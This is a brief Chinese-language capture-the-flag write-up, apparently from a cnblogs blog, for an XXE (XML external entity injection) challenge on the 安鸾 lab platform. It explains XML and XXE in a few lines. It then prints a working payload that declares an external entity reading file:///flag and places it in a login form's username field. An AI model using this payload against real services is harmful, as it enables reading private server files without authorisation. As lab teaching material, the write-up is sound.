XML外部实体注入 安鸾 Writeup
XML外部实体注入01
XML外部实体注入,简称XXE
网站URL:http://www.whalwl.host:8016/
提示:flag文件在服务器根目录下,文件名为flag
-
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
-
什么是XXE
XXE(XML External Entity Injection) 全称为 XML 外部实体注入
扩展阅读:
XML外部实体注入从入门到入土
XML实体注入
XML外部实体注入
- 话不多说直接上poc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag"> ]>
<user><username>&xxe;</username><password>admin</password></user>
本文来自博客园,作者:jzking121,转载请注明原文链接:https://www.cnblogs.com/jzking121/p/15141541.html